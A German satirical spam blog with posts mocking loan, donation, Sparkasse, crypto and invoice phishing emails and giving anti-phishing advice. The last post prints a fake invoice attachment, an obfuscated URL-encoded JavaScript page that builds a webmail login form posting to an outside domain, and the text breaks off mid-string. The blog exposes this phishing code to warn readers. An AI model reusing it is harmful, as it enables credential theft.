Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Autorenarchiv

RE

Donnerstag, 5. Mai 2022

Von: Susanne Klatten fundings <diskominfo@patikab.go.id>
Antwort an: financesus@hotmail.com
An: Recipients <diskominfo@patikab.go.id>

Absender gefälscht, alles weitere läuft über eine kostenlos und anonym eingerichtete Freemail-Adresse (diesmal von Microsoft, nicht von Google) und die Mail geht an ganz viele Empfänger gleichzeitig. Keine weiteren Fragen. 😩️

Hello. I‘m Susanne Klatten and I am From Germany, I can control your financial problems without resorting Banks in the range of Credit Money.

Hallo, ich bin der Hl. Maledictus und ich komme aus Deutschland. Ich kann dir einfach Geld in die Hand drücken und wir können uns den Umweg über die Bank sparen. 💰️

We offer personal Loans and Business Loan, i am an approved and certified lender with years of experience in Loan lending and we give out Collateral and Non Collateral Loan amounts ranging from 10,000.00€ ( $) to the maximum of 10,000,000.00€ with a fixed interest of 3% on an annual basis. Do you need a Loan?.

Ich biete Darlehen und Darlehen, ich bin zertifizierter Heiliger mit Prädikat und mit Jahren der Erfahrung im Anbieten von Darlehen und Darlehen, ich gebe Darlehen und Darlehen im Bereich von zehn Kiloeuro bis 10 Megaeuro. Oder auch Dollar oder so ein anderes Geldkram, ist ja alles das Gleiche. Aber ich habe einen festen Zinssatz von drei Prozent im Jahr. Komm, du brauchst doch jetzt ein Darlehen! 🤡️

You can also view my link and learn more about me.

https://en.wikipedia.org/wiki/Susanne_Klatten
https://www.forbes.com/profile/susanne-klatten

Du kannst vorher auch einen Link in meiner Spam klicken, wenn du erfahren willst, wer ich bin. Welchen? Na, meinen Wikipedia-Eintrag natürlich! Bist du jetzt überzeugt? 😎️

Email : financesus@hotmail.com

Bitte antworte mir nicht an meine Absenderadresse, denn die ist gefälscht. Aber das mit dem Geld, das stimmt. Genau wie mein Name. Du musst jetzt ganz feste dran glauben! 😇️

Signature,
Executive Chairman
Susanne Klatten.

Unterschrift¹ (mit dickem Edding auf dem Bildschirm gekritzelt)
Mitglied der Heiligen Wundertäter
St. Maledictus

¹Nein, diese Spam war natürlich auch nicht digital signiert.

Es wurde Ihnen eine Spende überreicht!!

Mittwoch, 4. Mai 2022

Von: Maria Fedor <beresnev@math.nsc.ru>
Antwort an: premjihashim60@gmail.com
An: Recipients <beresnev@math.nsc.ru>

Einmal die Dreieinigkeit des Vorschussbetrugs bitte! Der Absender ist gefälscht, alle weitere Kommunikation läuft über eine anonym und kostenlos eingerichtete Mailadresse bei GMail, und die Spam geht an ganz viele Empfänger gleichzeitig. Mehr muss man nicht wissen, um den E-Müll zu löschen. 🗑️

Und natürlich: Obwohl es angeblich um viel Geld geht und mein public key offen verfügbar ist, soll die gesamte Kommunikation unverschlüsselt laufen. Denn wer dazu imstande ist, seine E-Mail zu verschlüsseln – dafür muss man immerhin klicken können – der ist oft schon zu intelligent, um auf einen solchen Betrug hereinzufallen. 🎓️

Hallo, […]

Genau mein Name! 👏️

[…] eine Spende von 2.000.000,00 Euro wurde Ihnen gegeben.

Stimmt nicht. Ich habe eben noch mal nachgeschaut, und ich habe gerade genau 78 Cent. Wenn mir einer viertausend lila Läppchen der EZB gegeben hätte, sähe das völlig anders aus. 😁️

Kontaktieren Sie die E-Mail-Adresse unten, um weitere Informationen zur Beantragung des Geldes zu erhalten
premjihashim60@gmail.com

Eben sagtest du noch, das Geld wurde mir gespendet. Und jetzt soll ich es beantragen? Wie beim Jobcenter? Was denn nun, Spammer? 😂️

Bitte nicht an die Absenderadresse antworten. Die ist gefälscht. 🤥️

Aufrichtig
hash premji

Aber sowas von aufrichtig! 🤡️

Sparkasse GreenVest Anlageangebote

Dienstag, 3. Mai 2022

Natürlich kommt diese Spam nicht von der Spaßkasse. Mein Exemplar wurde über eine chinesische IP-Adresse versendet und hat einen Server der Spaßkasse nicht einmal aus der Ferne gesehen. 🤥️

Und der Spammer hat sich nicht einmal Mühe mit seinem Spamskript gegeben. Im folgenden Text sieht man manchmal [alternative Formulierungen | verschiedene Satzbauteile] in eckigen Klammern, damit ein Spamfilter nicht so leicht [die Muster erlernen kann | den Müll aussortieren kann]. Hier sollte das Spamskript natürlich zufällig eine der gegebenen Alternativen auswählen, aber das ist fehlgeschlagen, weil der Spammer sein Spamskript nicht verstanden hat. Er hätte natürlich einen kleinen lokalen Test machen können, bevor er hunderttausende kleiner Denkmäler für seine völlige Inkompetenz in die wehrlosen Postfächer macht, aber er ist ja Spammer. Und wenn er sich Mühe geben wollte, könnte er doch gleich arbeiten gehen. 🛠️

Ich befürchte dennoch, dass das ein sehr erfolgreiches Phishing wird. Denn wenn den Menschen Geldbündel vor die Nase gehalten werden und man ihnen auch noch etwas von ökologischer Ethik dazu vorlügt, dann wird die Gier das Hirn durch einen Sack Falschgeld ersetzen. 💰️

Logo der Sparkasse

Die Grafiken in dieser Spam¹ sind kostenlos und anonym bei Imgur gehostet. Das ist mittlerweile dermaßen typisch für alle Formen der Spam geworden, dass ich eine entsprechende Regel zum Aussortieren des Imgur-Mülls habe, und hoffentlich wird das bald überall Normalität sein. Es tut mir ja ein bisschen leid für Imgur, aber wenn man Spam nicht bekämpft, wenn man die leidige Arbeit mit seinem windigen Geschäftsmodell der ganzen Welt aufbürdet, so wie es Imgur tut, dann wird man eben selbst zur Spam. Und genau so behandelt. Möge der Pleitegeier sein Fresschen haben! 🍽️

Das überlagerte Wort „SPAM“ ist natürlich von mir. Ich bin nicht so gern Bildhoster für Kriminelle. 🙃️

Zu schade, dass jede Mailsoftware standardmäßig (und ohne irgendeinen sachlichen Grund, da man gut formatierte Dokumente an eine Mail anhängen kann) HTML-formatierte E-Mail versendet. Sonst könnte man den ganzen HTML-Müll aussortieren. Die einzigen, die HTML-formatierte E-Mail brauchen und ihre Möglichkeiten nutzen, sind Werber, Blender und Spammer. Sonst braucht und nutzt das niemand. 😐️

GreenVest >
Sinnlose Grafik eines Paragliders in einer Berglandschaft, darunter ein logoähnliches Objekt

Ach, eine grüne Weste wollen sie sich anziehen? 😁️

Pilotprojekt:
GreenVest

Jetzt verfugbar

Nur Umlaute sind mal wieder nicht verfugbar. 😅️

Exklusive Anlagenangebote

Exklusiv wie eine Postwurfsendung. 💩️

Sehr geehrte Kunden & Kundinnen,

Genau mein Name! 👍️

(Ich bin übrigens kein Kunde der Spaßkasse und werde niemals in meinem Leben einer sein. Aus Gründen.)

Als langjahriger [Kunde der Sparkasse|Inhaber eines Sparkassen Kontos], haben Sie nun die einmalige Chance ein [auf Sie zugeschnittenes|fur Sie personalisiertes] Anlagenangebot in unserem Pilotprojekt Sparkasse GreenVest zu erstellen. Fokussiert auf erneuerbare Energien: Okostrom aus Wind, Sonne & Co – Sparkasse GreenVest investiert Ihr Geld in exklusive und lukrative Investmentvehikel.

So so, Okostrom-Investmentvehikel. 🤣️

Habe ich eigentlich schon erwähnt, dass die Spaßkasse mit dieser Spam nichts zu tun hat? Aber eigentlich sollte das jeder Mensch bemerken.

Profitieren Sie von bis zu 14,5% Rendite jahrlich und investieren Sie gemeinsam mit der Sparkasse in eine grune Zukunft.

Hui, was für ein Renditeversprechen! Und „grun“ ists auch! Mit integriertem Ablasszettel für die Generation „Ökologische Betroffenheit durch Bambi-Film“, der man sogar „grüne“ Kraftstoffe fürs Auto verkaufen kann, ohne dass sich einer dieser bürgerlichen Idioten aus der spätkonsumistischen Dekadenzhölle daran stört, dass sein im Regelfall überdimensioniertes Auto mit Brot betankt wird. 🤮️

Genau die richtige „Zielgruppe“ für einen Betrug. 🎯️

Aber ich schweife ab… 😉️

Weitere Informationen

Wer da klickt, lasse alle Hoffnung fahren! Es gibt eine Weiterleitung über den dicksten Freund des Spammers, über Google, in die Domain deka (strich) fondsplan (punkt) com, die…

$ host deka-fondsplan.com
deka-fondsplan.com has address 194.87.48.72
$ country 194.87.48.72
194.87.48.72 is from Russian Federation (RU) Russian Federation (RU)
$ surbl deka-fondsplan.com
deka-fondsplan.com	LISTED: ABUSE
$ _

…zu einem russischen Server aufgelöst wird und bereits wegen massenhafter Verwendung in der Spam auf allen Blacklists dieser Welt zu finden ist. ⚠️

Und dort bekommt man die Gelegenheit, etwas unglaublich Dummes zu tun, indem man in einer „liebevoll“ nachgemachten Sparkassen-Website lauter Daten noch einmal eingibt, die der Spaßkasse schon längst bekannt sind, um auf diese Weise Verbrechern sein Bankkonto zu übergeben. 🤦‍♂️️

  • Weil in einer E-Mail mit so schönen Grafiken Fuffzehn-Prozent-Mondrenditen versprochen werden. 🤦‍♂️️
  • In einer unpersönlich formulierten E-Mail ohne Umlaute. 🤦‍♂️️
  • In einer E-Mail, deren (vom Spammer extrem leicht fälschbare) Absenderadresse noch nicht einmal nach Spaßkasse aussah. 🤦‍♂️️
  • In einer E-Mail, die zu einer Website führt, die noch nicht einmal in der Domain der Spaßkasse liegt, sondern in einer zwar gut klingenden, aber letztlich doch „schrägen“ Domain, wie man beim Blick auf die Adressleiste des Browsers sofort bemerkt. 🤦‍♂️️

Okay, wenn sie darauf reingefallen sind, will ich gar nicht weiter bissig über ihren Schaden spotten, aber hier war auch ohne Blick in den Header und Quelltext der Mail und ohne oberflächliche Analyse außerordentlich einfach zu bemerken, dass mit dieser E-Mail etwas nicht stimmen kann. Nicht jede Spam ist so schlecht. 😉️

Zum Glück für uns alle gibt es einen absolut sicheren Schutz gegen Phishing, der funktioniert, bequem ist und nichts kostet: Niemals in eine E-Mail klicken! 🖱️🚫️

Wenn man sich für Kriminelle „interessante“ Websites wie die Website seiner Bank als Lesezeichen im Browser anlegt und sich angewöhnt, diese Websites nur noch über das Lesezeichen aufzurufen, statt in E-Mail zu klicken, kann einem kein Verbrecher mehr einen giftigen Link unterschieben. Diese Sicherheit kommt übrigens ohne jeglichen Komfortverlust, denn in beiden Fällen braucht man nur zu klicken – aber den Link aus den Browser-Lesezeichen können Kriminelle nicht ohne Aufwand manipulieren. Wenn man eine E-Mail seiner Bank erhalten hat, einfach ganz normal über das Browser-Lesezeichen die Website seiner Bank aufrufen und sich dort wie gewohnt anmelden. Wenn man dann nicht ebenfalls die Hinweise aus der Mail präsentiert bekommt, hat man einen dieser fiesen Cyberangriffe abgewehrt. Selbst, wenn die Phishing-Spam einmal wesentlich besser als dieses Exemplar sein sollte. So einfach geht das! 🛡️

Und ja, eine Bank, die ihren Kunden mit E-Mail unseriös aussehende Angebote macht, wird ihre Kunden auch nach einer Anmeldung in die Fernkontoführung² mit derartigen Angeboten belästigen. Denn die Bank verdient daran immer besser als der Kunde. Im Geschäftsleben wird man nun einmal übern Tisch gezogen. Gefällt mir auch nicht. Ist aber so. 😐️

¹Meine Mailsoftware lädt solche Grafiken aus dem Web nicht nach, aber ich schaue mir natürlich den Quelltext von Spams an und weiß daher, wie die Spam aussehen soll.

²Von Werbern und ihren stinkenden Brüdern, den Journalisten, im Regelfall als „Online-Banking“ bezeichnet.

Investieren Sie in Krypto und verdienen Sie 7000€ jeden Tag ����k����

Montag, 2. Mai 2022

Spammen sie für Kryptogeldbetrug und sie brauchen sich nicht einmal mehr Gedanken über das Encoding des Betreffs ihrer Spammail machen. Ideal für Menschen, die das mit dem Gedankenmachen eh nicht so mögen. 💩️

Die Spam verzichtet auf Text und breitet ihre Botschaft komplett in einem Bild aus, das aus dem Web nachgeladen wird. Menschen mit einer sicher konfigurierten Mailsoftware sehen hier also außer der Möglichkeit, sich von unbestellten Mülllieferungen ohne Inhalt abzumelden, gar nichts von der beabsichtigen Botschaft. Oder anders gesagt: Wer sicher konfigurierte Software benutzt, ist für den Betrug dieser Betrüger schon viel zu schlau. 💡️

Natürlich wird der Webserver, auf dem das Bild liegt…

$ whois tildacdn.com | grep -i ^registrant | sed 8q
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
$ _

…über einen Dienstleister aus dem staubigen Arizona¹ völlig anonym betrieben, denn es ist ja doch ein bisschen unangenehm, wenn man vom Betrug leben möchte und dann kommt auf einmal diese Polizei vorbei und legt einem diese lästigen Handschellen an. Vermutlich sind die persönlichen Daten, die diese Verbrecher gegenüber dem Anonymisierungs-Dienstleister angegeben haben, von einem ihrer früheren Opfer mitgenommen. Das ist ärgerlich für das frühere Opfer des Betrugs, aber das ist eben auch der Grund, weshalb man kriminellen Spammern niemals persönliche Daten gibt. Auch nicht, wenn sie mit Geld, Geschenken und riesigen Vorteilen winken. 🎣️

Sie lügen. 🤥️

Und sie sind wirklich widerlich. 🤮️

So, nun zur Spam, die fast keinen Text enthält:

Zeit Online -- Sonderbericht: Friedrich Merz jüngste Investition lässt Experten und Grossbanken erschrecken -- Letzte Woche trat er mit Markus Lanz auf und kündigte ein neues 'Vermögens-Schlupfloch' an, von dem er sagt, es könne jeden innerhalb von 3-4 Monaten in einen Millionär verwandeln. Friedrich Merz forderte jeden in Deutschland auf, diese erstaunliche Gelegenheit zu nutzen, bevor die großen Banken sie für immer schließen -- [Read More] -- Vielleicht haben sie von dieser neuen Krypto-Währungs-Investitionsplattform namens Bitcoin Revolution gehört, die normalen Menschen in Deutschland, Asien und Nordamerika hilft, über Nacht ein Vermögen aufzubauen. Vielleicht sind Sie skeptisch, weil es zu gut klingt, um wahr zu sein. ??? -- Ich verstehe das, weil ich das Gleiche dachte, als mir ein vertrauter Freund davon erzählte. Aber nachdem ich mit eigenen Augen gesehen hatte, wie viel Geld er verdiente, musste ich es selbst ausprobieren. -- Wir erleben harte wirtschaftliche Zeiten, und dies ist die Lösung, auf die die Menschen gewartet haben. Noch nie in der Geschichte hatten wir eine so erstaunliche Gelegenheit, die die einfachen Menschen so leicht nutzen können, um in so kurzer Zeit so enormen Wohlstand zu schaffen. -- [Read More]

abmelden

Für Genießer habe ich das Bild auch in Originalgröße. Der überlagerte Schriftzug „SPAM“ ist natürlich von mir, denn ich werde nicht so gern Bildhoster für Kriminelle. 😉️

Es ist leicht, zu bemerkeln, dass dieser Text trotz des vorsätzlich irreführenden Logos nicht aus diesem Internet-Fischblatt „Zeit Online“ kommt. Zwar gibt es dort seit langer Zeit kein Lektorat mehr, und das merkt man leider immer wieder, wenn man den Ausfluss aus dieser Redaktion „genießt“, aber derartige Rechtschreibfehler (kein Apostroph nach dem Namen Merz im Genitiv, „Grossbanken“, mehrfach wiederholte Satzzeichen), dieses Abgleiten in „Read More“ für den Text auf dem Klickeknopf und die allgemeine sprachliche Unbeholfenheit auf mäßig fortgeschrittenem infantilen Level (erschreckende Banken, normale Menschen, harte wirtschaftliche Zeiten, enormer Wohlstand, geschichtliche Dimension einer angeblichen Geldanlage) liegt weit unterhalb des sprachlichen Niveaus der Zeit und wäre in dieser Form und Häufung nicht einmal in der Bildzeitung durchgegangen. Ja, dieser Text wäre der Mehrheit der Werbetexter vermutlich zu plump und trashig. 💩️

Und wenn man erstmal gemerkt hat, dass das Zeit-Online-Logo über diesem Text eine Lüge ist, dann wird schnell klar, dass alles in diesem Text eine Lüge ist. 🤥️

Natürlich funktionieren die Bitcoin-Reichwerdmethoden nicht. Wenn Bitcoin gehandelt wird, ist das ein Markt. Dort entsteht ein Preis für eine Ware. Dort entsteht kein Geld. Geld wird auf einem Markt „nur“ umverteilt, das heißt, nach einem Handel hat jemand mehr Geld und jemand hat weniger Geld. Wenn durch Bitcoin-Handel angeblich in einem Vierteljahr jeder in einen Millionär verwandelt wird (und es sich nicht um Zimbabwe-Dollar aus der Hyperinflation handelt), stellt sich schon die Frage, wo wohl die achtzig Billiarden Euro für die Bevölkerung der Bundesrepublik Deutschland herkommen sollen, die dabei an die Bevölkerung umverteilt würden. Und natürlich die Frage, was dieses Geld dann wohl wert wäre – eine Klopapierkrise hätten wir jedenfalls nicht mehr zu befürchten, wenn man die bunten Läppchen der EZB auch noch etwas saugfähiger machte. 😁️

Zum Vergleich: Der Bundeshaushalt im fürchterlich teuren Corona-Jahr 2021 hat nach Angaben des Bundesfinanzministeriums rd. 547,7 Milliarden Euro betragen. Die hier versprochenen Gewinne durch Bitcoin-Handel sind, wenn jeder davon profitiert, mehr als 145mal so hoch. 😯️

Das einzige, was mich an dieser Spam erheitert, ist, dass die Spammer auf die Idee gekommen sind, dass jemand, der den CDU-Fraktions- und Parteivorsitzenden Friedrich Merz bei irgendwelchen Talkshow-Auftritten für vertrauenswürdig hält, wohl auch auf einen Betrug reinfallen könnte. 😂️

Übrigens: Ich weiß nicht, wie die verlinkte Website heute aussieht, denn diese Spam war ein Zustecksel eines Lesers und ich wollte deshalb nicht schauen, wo der Link mit personalisierter ID in der Adresse hinführt, aber damals, vor nicht ganz vier Jahren, wurde der Betrug „Bitcoin Revolution“ so wie in meinem Text vom 26. Oktober 2018 präsentiert. Reich geworden ist davon keiner. Außer den Betrügern und den Spammern, die sich von Betrügern Affiliate-Geld dafür auszahlen lassen, dass sie den Betrügern neue Opfer zutreiben. Ich wäre nicht überrascht, wenn die heute noch das selbe Design verwenden. Denn wenn Spammer sich Mühe geben wollten, dann könnten sie ja gleich arbeiten gehen. 🛠️

Diese Spam aus dem täglichen Klo des Posteinganges ist ein Zustecksel meines Lesers A. H.

¹Es kann völlig vernünftige Gründe geben, solche Dienstleister zu benutzen, ohne dass man kriminell ist. Zum Beispiel, weil man mit seiner persönlichen Website lieber nicht so zugreifbar für Stalker, Werber, Spammer, gewaltbereite politische und religiöse Extremisten und Idioten sein möchte. Bei kommerziellen Websites im Rechtsraum der EU, die einer gesetzlichen Impressumspflicht unterliegen, ist so ein Anonymisierungsschritt allerdings immer sinnlos, denn man kann sie sowieso nicht legal und anonym betreiben. Die Benutzung solcher Dienstleister ist hier immer ein klarer Hinweis auf kriminelle Absichten.

Mittteilung Ihrer Sparkasse

Sonntag, 1. Mai 2022

Ich kommentiere den Strunz mal nicht weiter, denn dieses wundervolle Deutsch demaskiert sich selbst:

Wichtige Mitteilung
Sehr geehrte_r Kunde_in

Das exklusive Sparkassen Online Banking System bietet unseren Kontoführend*in neue Möglichkeiten um Ihre Erfahrung zu verbessern.

Folgende Updates wurden aktualisiert:

- Zügigere Überweisung innerhalb der Europäische Union
– Neuartige Sicherheitssysteme gegen Hackerangriffe
– Ein internes elektronisches Postfach für schnellere Termine mit unseren Mitarbeiter_in
– TAN-Frei Überweisungen an Freunde und Familie umsetzen

Wir die Sparkasse möchten schnellstmöglich diese Neuerungen umsetzen. Damit diese neuen Updates aktualisiert werden können, bitten wir Sie als geschätzter Sparkassen Kunden um Ihre Mitarbeit.

Sie können die folgende Umstellung ganz einfach abwickeln. Es folgt dann eine manuelle Kontrolle Ihrer eingegebenen Daten von unseren .

Zur Bestätigung

Wir schätzen Ihre Zeit als treuer Kunde.

Beste Grüße und viel Glück

IT-Abteilung der Sparkasse

Hauptsache für die Spammer ists allerdings, dass niemand das gewünschte Glück beim Denken hat. 😁️

Natürlich geht der Link nicht zur Website irgendeiner Sparkasse, sondern erstmal zum größten Freund des Spammers und Betrügers, zu Google. Dort gibt es eine Weiterleitung zu spk (strich) mitarbeiterportal (punkt) com mit schönen Grüßen aus Russland. Alle Daten, die man dort eingibt (und die die richtige Spaßkasse schon längst kennt), gehen direkt an Verbrecher. Hinterher wird man noch einmal angerufen und „darf“ eine betrügerische Überweisung seines Geldes mit den aktuellen Sicherheitserhöhungsversuchen der hiesigen Bankhäuser abnicken, wissenschon, nur für einen Test. Aber das ist nicht der einzige Schaden, der entsteht. ☹️💸️

Deshalb klickt man ja auch nicht in eine E-Mail. Wer sich die Website seiner Spaßkasse als Lesezeichen im Browser abgelegt hat und diese Website nur über dieses Lesezeichen aufruft, kann keinen giftigen Link untergeschoben bekommen. Einmal normal bei der Spaßkasse über das Browser-Lesezeichen anmelden, feststellen, dass das Problem gar nicht existiert und den kriminellen Sondermüll löschen. So einfach und bequem geht Computersicherheit! 🛡️

Nachricht für gammelfleisch!

Samstag, 30. April 2022

Oh schön, im Töpfchen für Sieger! 🚽️

Nur 6 Tropfen pro Tag verwandeln den Körper in eine Fettverbrennungsmaschine !

MC Logo
Klicke Hier >>

Abmelden

Nein danke, ich will keine Maschine sein. Und brennen möchte ich auch nicht. Womit soll ich mich denn während des Brennvorganges runterkühlen? Ach, Spammer, du richtest dich nur an Menschen mit intensivem, psychiatrisch wertvollem Selbsthass? Und den willst du für eine Handvoll Geld weiter befeuern? Scheißegal, was das für Konsequenzen für deine Opfer hat? Das merkt man aber auch. 😠️

Nur die Gesundheit sollte man Leuten wie dir nicht anvertrauen. 💀️

Die Bullshit-Texte, mit denen irgendwelche Bauch-weg-Wunder verkauft werden sollen, sind in den letzten Wochen kein bisschen intelligenter geworden. Und die Anpreisungen sind nicht nur physikalisch unmöglich, sondern auch sofort als Lüge zu erkennen. Also bitte auf gar keinen Fall darauf reinfallen! 😉️

Ihre Rechnung, Rechnungs-Nr.137784 vom 25.04.2022

Freitag, 29. April 2022

Nein, diese Mail kommt nicht von HostEurope. Es ist Phishing. ⚠️

Hallo ,

Ein Komma. Genau mein Name! 👍️

Ihre aktuelle Rechnung für Ihre Kundennummer 137784 vom 25.04.2022 steht für Sie auf

Das ist ja schön, dass die Rechnung für mich aufsteht. 😂️

Der sofort fällige Gesamtbetrag von 20,97 EUR wird Ihrem Konto in Kürze belastet. Der ausgewiesene Rechnungsbetrag wird mit ggf. vorhandenem Guthaben verrechnet.

Aha. Ich habe gegebenenfalls vorhandenes Guthaben, das verrechnet wird. So schade, dass die Computer, die im Auftrag des Hosters HostEurope Rechnungsmails versenden, nicht zum Rechnen imstande sind und mir nicht den korrekten Rechnungsbetrag anzeigen können. Vielleicht sollte HostEurope sich mal Rechner kaufen, die auch rechnen können. Das würde vieles vereinfachen. 🤣️

Ihre Rechnung liegt im HTML-Format vor und kann mit einem Mozilla Firefox, Google Chrome, Internet Explorer.

Sie kann übrigens auch mit einem Pale Moon, LibreWolf, Opera oder sonstigen Webbrowser. Aber bitte nicht mit einem Lynx oder einem Desktop-Browser, der kein Javascript ausführt, denn diese HTML-Datei ist kein HTML-Dokument, sondern…

$ cat Rechnung-137784.html 
<!DOCTYPE html>
<html lang="en">
<script language="javascript">
document.write(unescape('%3C%68%65%61%64%3E%0A%20%20%20%20%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%55%54%46%2D%38%22%3E%0A%20%20%20%20%3C%74%69%74%6C%65%3E%52%6F%75%6E%64%63%75%62%65%20%57%65%62%6D%61%69%6C%20%3A%3A%20%57%65%6C%63%6F%6D%65%20%74%6F%20%52%6F%75%6E%64%63%75%62%65%20%57%65%62%6D%61%69%6C%3C%2F%74%69%74%6C%65%3E%0A%20%20%20%20%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%76%69%65%77%70%6F%72%74%22%20%63%6F%6E%74%65%6E%74%3D%22%77%69%64%74%68%3D%64%65%76%69%63%65%2D%77%69%64%74%68%2C%20%69%6E%69%74%69%61%6C%2D%73%63%61%6C%65%3D%31%2E%30%2C%20%73%68%72%69%6E%6B%2D%74%6F%2D%66%69%74%3D%6E%6F%2C%20%6D%61%78%69%6D%75%6D%2D%73%63%61%6C%65%3D%31%2E%30%22%3E%0A%20%20%20%20%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%63%73%73%2F%62%6F%6F%74%73%74%72%61%70%2E%6D%69%6E%2E%63%73%73%22%3E%0A%20%20%20%20%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%63%73%73%2F%73%74%79%6C%65%73%2E%63%73%73%22%3E%0A%09%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%66%6F%6E%74%73%2F%66%61%2D%73%6F%6C%69%64%2D%39%30%30%2E%77%6F%66%66%22%3E%0A%20%20%20%20%3C%73%74%79%6C%65%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%3E%0A%20%20%20%20%09%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%67%65%6E%65%72%61%74%65%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%67%65%6E%65%72%61%74%65%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%79%65%73%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%79%65%73%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%73%75%62%6D%69%74%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%73%75%62%6D%69%74%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%63%6F%6E%74%69%6E%75%65%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%63%6F%6E%74%69%6E%75%65%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%73%61%76%65%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%73%61%76%65%3A%62%65%66%6F%72%65%20%7B%0A%20%20%20%20%63%6F%6E%74%65%6E%74%3A%20%6E%6F%6E%65%3B%0A%7D%0A%40%66%6F%6E%74%2D%66%61%63%65%20%7B%0A%20%20%20%20%20%20%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%20%27%46%6F%6E%74%41%77%65%73%6F%6D%65%2D%73%77%61%70%27%3B%0A%20%20%20%20%20%20%66%6F%6E%74%2D%64%69%73%70%6C%61%79%3A%20%73%77%61%70%3B%0A%20%20%20%20%20%20%73%72%63%3A%20%6C%6F%63%61%6C%28%27%46%6F%6E%74%41%77%65%73%6F%6D%65%27%29%2C%20%75%72%6C%28%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%66%6F%6E%74%73%2F%66%61%2D%73%6F%6C%69%64%2D%39%30%30%2E%77%6F%66%66%32%29%20%66%6F%72%6D%61%74%28%27%77%6F%66%66%32%27%29%3B%0A%20%20%20%20%7D%0A%20%20%20%20%3C%2F%73%74%79%6C%65%3E%0A%3C%2F%68%65%61%64%3E%0A%0A%3C%62%6F%64%79%20%63%6C%61%73%73%3D%22%74%61%73%6B%2D%6C%6F%67%69%6E%20%61%63%74%69%6F%6E%2D%6E%6F%6E%65%22%3E%0A%20%20%20%20%3C%64%69%76%20%69%64%3D%22%6C%61%79%6F%75%74%22%3E%0A%20%20%20%20%20%20%20%20%3C%68%31%20%63%6C%61%73%73%3D%22%76%6F%69%63%65%22%3E%67%6C%6F%62%61%6C%70%6F%69%6E%74%2E%65%73%20%57%65%62%6D%61%69%6C%20%4C%6F%67%69%6E%3C%2F%68%31%3E%0A%20%20%20%20%20%20%20%20%3C%64%69%76%20%69%64%3D%22%6C%61%79%6F%75%74%2D%63%6F%6E%74%65%6E%74%22%20%63%6C%61%73%73%3D%22%73%65%6C%65%63%74%65%64%20%6E%6F%2D%6E%61%76%62%61%72%22%20%72%6F%6C%65%3D%22%6D%61%69%6E%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%65%62%6D%61%69%6C%2E%6E%6F%76%6F%68%6F%67%61%72%2E%65%73%2F%73%6B%69%6E%73%2F%65%6C%61%73%74%69%63%2F%69%6D%61%67%65%73%2F%6C%6F%67%6F%2E%73%76%67%3F%73%3D%31%36%34%39%32%33%31%33%38%37%22%20%69%64%3D%22%6C%6F%67%6F%22%20%61%6C%74%3D%22%4C%6F%67%6F%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%66%6F%72%6D%20%69%64%3D%22%6C%6F%67%69%6E%2D%66%6F%72%6D%22%20%6E%61%6D%65%3D%22%6C%6F%67%69%6E%2D%66%6F%72%6D%22%20%63%6C%61%73%73%3D%22%70%72%6F%70%66%6F%72%6D%22%20%61%63%74%69%6F%6E%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%67%65%6E%65%72%61%6C%2F%61%70%69%2E%70%68%70%22%20%6D%65%74%68%6F%64%3D%22%70%6F%73%74%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%61%62%6C%65%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%62%6F%64%79%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%72%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%67%72%6F%75%70%20%72%6F%77%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%64%20%63%6C%61%7